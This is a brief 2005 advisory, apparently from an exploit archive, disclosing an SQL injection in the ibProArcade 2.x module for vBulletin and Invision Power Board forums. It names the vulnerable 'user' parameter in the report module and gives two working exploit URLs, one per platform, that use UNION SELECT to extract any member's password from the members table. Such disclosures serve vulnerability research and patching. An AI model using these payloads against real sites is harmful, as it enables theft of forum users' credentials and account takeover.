The ibProArcade module versions 2.x that are commonly used in vBulletin and Invision Power board software are susceptible to SQL injection flaws. Details provided.
79f6de0e272f1bf830d4ffd79965f9fea2316cfd146983744ef724d2c014a1cf
Sql injection in ibProArcade.
#############################
This bug was discoverd in all of the versions of ibproarcade 2.x.
It was tested and found perfectly working under vBulettin or Invision power board.
Date:2005-11-5
The injection is here:
module=report&user=[userid]
Query: 'SELECT name FROM ibf_members WHERE id=[userid]'
Exploit:
IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]
vBulettin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]
Thankyou , B~HFH
bhfh01@gmail.com